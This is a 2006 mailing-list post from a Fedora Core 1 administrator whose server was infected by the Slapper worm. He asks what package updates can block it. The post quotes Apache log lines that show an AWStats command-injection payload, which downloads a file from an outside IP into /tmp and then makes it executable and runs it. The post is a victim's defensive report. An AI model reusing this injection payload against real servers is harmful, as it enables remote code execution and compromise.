Hi guys, I have an FC1 machine which got infected twice with the slapper worm, and then started DOS attacking a large vendor. I've stopped slapper in its tracks with a couple of changes to FC1, but in analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache SSL server which I've now turned off), I see the following bit of interest in my apache access_log: 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" These "scripz" files end up going into /tmp, being compiled with gcc, renamed to "httpd" and run as that. I'm using: perl-5.8.3-17.4.legacy httpd-2.0.51-1.9.legacy openssl-0.9.7a-33.13.legacy Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? Michael. -- fedora-legacy-list@xxxxxxxxxx https://www.redhat.com/mailman/listinfo/fedora-legacy-list
